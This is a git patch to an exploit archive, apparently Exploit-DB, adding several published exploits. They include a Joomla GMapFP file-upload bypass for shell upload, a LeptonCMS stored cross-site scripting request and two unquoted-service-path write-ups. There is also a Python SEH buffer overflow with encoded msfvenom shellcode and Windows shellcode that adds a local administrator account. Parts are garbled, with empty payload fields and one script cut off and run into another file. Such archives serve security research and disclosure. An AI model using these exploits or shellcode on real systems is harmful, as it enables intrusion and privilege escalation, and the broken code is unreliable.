From 606ad946d315e80dbcd4bb6e87544fa54c218253 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 26 Mar 2020 05:01:48 +0000 Subject: [PATCH] DB: 2020-03-26 7 changes to exploits/shellcodes AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH) Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting Joomla! Component GMapFP 3.30 - Arbitrary File Upload LeptonCMS 4.5.0 - Persistent Cross-Site Scripting Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) --- exploits/php/webapps/48245.txt | 2 +- exploits/php/webapps/48248.txt | 24 ++++++ exploits/php/webapps/48250.txt | 43 ++++++++++ exploits/windows/local/48249.txt | 37 ++++++++ exploits/windows/local/48251.txt | 37 ++++++++ exploits/windows/local/48253.py | 69 +++++++++++++++ files_exploits.csv | 7 +- files_shellcodes.csv | 1 + shellcodes/windows_x86-64/48252.txt | 127 ++++++++++++++++++++++++++++ 9 files changed, 345 insertions(+), 2 deletions(-) create mode 100644 exploits/php/webapps/48248.txt create mode 100644 exploits/php/webapps/48250.txt create mode 100644 exploits/windows/local/48249.txt create mode 100644 exploits/windows/local/48251.txt create mode 100755 exploits/windows/local/48253.py create mode 100644 shellcodes/windows_x86-64/48252.txt diff --git a/exploits/php/webapps/48245.txt b/exploits/php/webapps/48245.txt index 2622b9f68..fb35347b7 100644 --- a/exploits/php/webapps/48245.txt +++ b/exploits/php/webapps/48245.txt @@ -1,4 +1,4 @@ -# Exploit Title: Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting +# Exploit Title: Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting # Date: 2020-02-18 # Vendor Homepage: https://wpforms.com # Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/#developers 
diff --git a/exploits/php/webapps/48248.txt b/exploits/php/webapps/48248.txt
new file mode 100644
index 000000000..6b8186610
--- /dev/null
+++ b/exploits/php/webapps/48248.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload
+# Google Dork: inurl:''com_gmapfp''
+# Date: 2020-03-25
+# Exploit Author: ThelastVvV
+# Vendor Homepage:https://gmapfp.org/
+# Version:* Version J3.30pro
+# Tested on: Ubuntu
+
+# PoC:
+
+http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image
+
+# you can bypass the the restriction by uploading your file.php.png , file2.php.jpeg , file3.html.jpg ,file3.txt.jpg
+
+# Dir File Path:
+
+http://127.0.0.1/images/gmapfp/file.php
+
+or
+
+http://127.0.0.1//images/gmapfp/file.php.png
+
+# The Joomla Gmapfp Components 3.x is allowing
+# remote attackers to upload arbitrary files upload/shell upload due the issues of unrestricted file uploads
\ No newline at end of file
diff --git a/exploits/php/webapps/48250.txt b/exploits/php/webapps/48250.txt
new file mode 100644
index 000000000..01f7d3944
--- /dev/null
+++ b/exploits/php/webapps/48250.txt
@@ -0,0 +1,43 @@
+# Exploit Title: LeptonCMS 4.5.0 - Persistent Cross-Site Scripting
+# Google Dork: "lepton cms"
+# Date: 2019-03-24
+# Exploit Author: SunCSR (Sun* Cyber Security Research)
+# Vendor Homepage: https://lepton-cms.org/english/home.php
+# Software Link:
+https://lepton-cms.org/posts/new-release-lepton-4.5.0-139.php
+# Version: 4.5.0
+# Tested on: Windows
+# CVE : N/A
+
+### Vulnerability : Persistent Cross-Site Scripting
+
+# Description
+A stored cross-site-scripting security issue in the edit page feature
+Url : http://TARGET/lepton/backend/pages/modify.php
+Request Type: POST
+Vulnerable Parameter : "content"
+Payload : content=
+
+#POC
+POST /lepton/modules/wysiwyg/save.php?leptoken=03d01fea73f9810402beez1585032684 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 79
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/lepton/backend/pages/modify.php?page_id=5&leptoken=f04ef2dc728873e9fa849z1585032680
+Cookie: cookieconsent_status=dismiss; SESSc3618c3927e551a1d6443b365aef1bc3=_guGZcGkV8IUWJx91f8pVQo8aBpxO4ipp75Un8WQN-g; _ctr=MTI3XzBfMF8xLlpa; nv4_cltz=420.420.420%257C%252F%257C.thiennv.com; nv4_ctr=MTI3XzBfMF8xLlpa; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off; 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7; lep8407sessionid=6aqrn6ccetoeqdes68e44hdlul
+Upgrade-Insecure-Requests: 1
+
+page_id=5§ion_id=5&content5=
+
+### History
+=============
+2020-03-18 Issue discovered
+2020-04-20 Vendor contacted
+2020-04-21 Vendor response and hotfix
+2020-04-23 Vendor releases fixed versions
\ No newline at end of file
diff --git a/exploits/windows/local/48249.txt b/exploits/windows/local/48249.txt
new file mode 100644
index 000000000..0b99cb7aa
--- /dev/null
+++ b/exploits/windows/local/48249.txt
@@ -0,0 +1,37 @@
+# Exploit Title: AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-03-24
+# Vendor Homepage:https://www.avast.com/
+# Software Link :https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx
+# Tested Version: 5.5.522.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 8.1 Single Language x32 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | f
+indstr /i /v "C:\Windows\\" | findstr /i "Avast SecureLine" | findstr /i /v """
+Avast SecureLine
+ SecureLine C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
+ Auto
+
+C:\>sc qc SecureLine
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SecureLine
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Avast SecureLine
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+# Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path
+# undetected by the OS or other security applications where it could potentially be executed during
+# application startup or reboot. If successful, the local user's code would execute with the elevated
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48251.txt b/exploits/windows/local/48251.txt
new file mode 100644
index 000000000..1e7db5c21
--- /dev/null
+++ b/exploits/windows/local/48251.txt
@@ -0,0 +1,37 @@
+# Exploit Title: 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path
+# Date: 2020-03-24
+# Author: Felipe Winsnes
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Version: 8.54
+# Tested on: Windows 7
+
+# Step to discover Unquoted Service Path:
+
+C:\Users\IEUser>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+srvInventoryWebServer srvInventoryWebServer C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe Auto
+
+# Service info:
+
+C:\>sc qc srvInventoryWebServer
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: srvInventoryWebServer
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : srvInventoryWebServer
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\>
+
+# Exploit:
+
+# A successful attempt would require the local user to be able to insert their code in the
+# system root path undetected by the OS or other security applications where it could
+# potentially be executed during application startup or reboot. If successful, the local
+# user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48253.py b/exploits/windows/local/48253.py
new file mode 100755
index 000000000..ba2e52d64
--- /dev/null
+++ b/exploits/windows/local/48253.py
@@ -0,0 +1,69 @@
+# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
+# Date: 2020-03-24
+# Author: Felipe Winsnes
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Version: 8.54
+# Tested on: Windows 7
+
+# Proof of Concept:
+# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
+# 2.- Copy the content of the new file 'poc.txt' to clipboard
+# 3.- Open the Application
+# 4.- Go to 'Main' or 'Computers'
+# 5.- Click upon 'Add'
+# 6.- Paste clipboard on 'Computer' parameter, under the title "Computer Card"
+# 7.- Click "OK"
+# 8.- Profit
+
+# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Strike-Network-Inventory-Explorer-Structered-Exception-Handling-Overwrite/
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed
+# Payload size: 448 bytes
+
+buf = b""
+buf += b"\x89\xe2\xda\xc3\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x78\x68\x4f"
+buf += b"\x72\x47\x70\x63\x30\x57\x70\x63\x50\x4d\x59\x4b\x55"
+buf += b"\x55\x61\x49\x50\x45\x34\x6c\x4b\x50\x50\x36\x50\x4c"
+buf += b"\x4b\x53\x62\x56\x6c\x4e\x6b\x33\x62\x44\x54\x4e\x6b"
+buf += b"\x42\x52\x54\x68\x74\x4f\x68\x37\x50\x4a\x56\x46\x44"
+buf += b"\x71\x49\x6f\x6e\x4c\x45\x6c\x63\x51\x53\x4c\x53\x32"
+buf += b"\x76\x4c\x61\x30\x5a\x61\x58\x4f\x74\x4d\x76\x61\x49"
+buf += b"\x57\x59\x72\x5a\x52\x46\x32\x56\x37\x6c\x4b\x30\x52"
+buf += b"\x36\x70\x6c\x4b\x73\x7a\x57\x4c\x4c\x4b\x30\x4c\x64"
+buf += b"\x51\x70\x78\x7a\x43\x33\x78\x75\x51\x68\x51\x70\x51"
+buf += b"\x4c\x4b\x76\x39\x55\x70\x67\x71\x38\x53\x4e\x6b\x31"
+buf += 
b"\x59\x66\x78\x38\x63\x45\x6a\x51\x59\x6c\x4b\x70\x34"
+buf += b"\x4c\x4b\x57\x71\x59\x46\x45\x61\x59\x6f\x6e\x4c\x4b"
+buf += b"\x71\x58\x4f\x66\x6d\x76\x61\x5a\x67\x56\x58\x6b\x50"
+buf += b"\x73\x45\x49\x66\x75\x53\x71\x6d\x4c\x38\x37\x4b\x43"
+buf += b"\x4d\x67\x54\x63\x45\x4b\x54\x52\x78\x6c\x4b\x73\x68"
+buf += b"\x37\x54\x56\x61\x69\x43\x73\x56\x4c\x4b\x76\x6c\x32"
+buf += b"\x6b\x6e\x6b\x61\x48\x65\x4c\x55\x51\x7a\x73\x6c\x4b"
+buf += b"\x54\x44\x4e\x6b\x43\x31\x6a\x70\x4b\x39\x32\x64\x35"
+buf += b"\x74\x55\x74\x63\x6b\x43\x6b\x75\x31\x72\x79\x73\x6a"
+buf += b"\x56\x31\x59\x6f\x4b\x50\x53\x6f\x51\x4f\x43\x6a\x4c"
+buf += b"\x4b\x62\x32\x6a\x4b\x4c\x4d\x43\x6d\x63\x5a\x76\x61"
+buf += b"\x6e\x6d\x6d\x55\x4e\x52\x53\x30\x77\x70\x55\x50\x76"
+buf += b"\x30\x32\x48\x70\x31\x6c\x4b\x50\x6f\x6f\x77\x69\x6f"
+buf += b"\x58\x55\x4d\x6b\x4a\x50\x58\x35\x4e\x42\x42\x76\x75"
+buf += b"\x38\x6f\x56\x6f\x65\x4d\x6d\x6d\x4d\x59\x6f\x39\x45"
+buf += b"\x77\x4c\x76\x66\x73\x4c\x76\x6a\x4d\x50\x79\x6b\x4d"
+buf += b"\x30\x70\x75\x37\x75\x6f\x4b\x53\x77\x67\x63\x73\x42"
+buf += b"\x72\x4f\x50\x6a\x55\x50\x56\x33\x39\x6f\x39\x45\x45"
+buf += b"\x33\x30\x61\x50\x6c\x70\x63\x34\x6e\x42\x45\x51\x68"
+buf += b"\x31\x75\x65\x50\x41\x41"
+
+nseh = struct.pack("
+#include
+#include
+
+char code[] = \
+"\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x1c"
+"\xad\x96\xad\x8b\x40\x08\x50\x8b\x58\x3c\x01\xc3"
+"\x8b\x5b\x78\x01\xc3\x8b\x53\x20\x01\xc2\x8b\x4b"
+"\x24\x01\xc1\x51\x8b\x7b\x1c\x01\xc7\x57\x68\x57"
+"\x69\x6e\x45\x31\xc0\x89\xd7\x89\xe6\x31\xc9\xfc"
+"\x8b\x3c\x87\x03\x7c\x24\x0c\x66\x83\xc1\x04\xf3"
+"\xa6\x74\x03\x40\xeb\xe7\x8b\x4c\x24\x08\x66\x8b"
+"\x04\x41\x8b\x54\x24\x04\x8b\x1c\x82\x03\x5c\x24"
+"\x0c\x31\xc9\xf7\xe1\xb0\x44\x50\x68\x20\x2f\x41"
+"\x44\x68\x52\x4f\x4f\x54\x68\x6f\x72\x73\x20\x68"
+"\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x41"
+"\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67"
+"\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
+"\x44\x20\x26\x68\x24\x20\x2f\x41\x68\x52\x30\x30"
+"\x54\x68\x20\x49\x40\x6d\x68\x52\x4f\x4f\x54\x68"
+"\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63"
+"\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e"
+"\x89\xe0\x51\x50\xff\xd3";
+
+int main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int(*)()) code;
+ (int)(*func)();
+}
\ No newline at end of file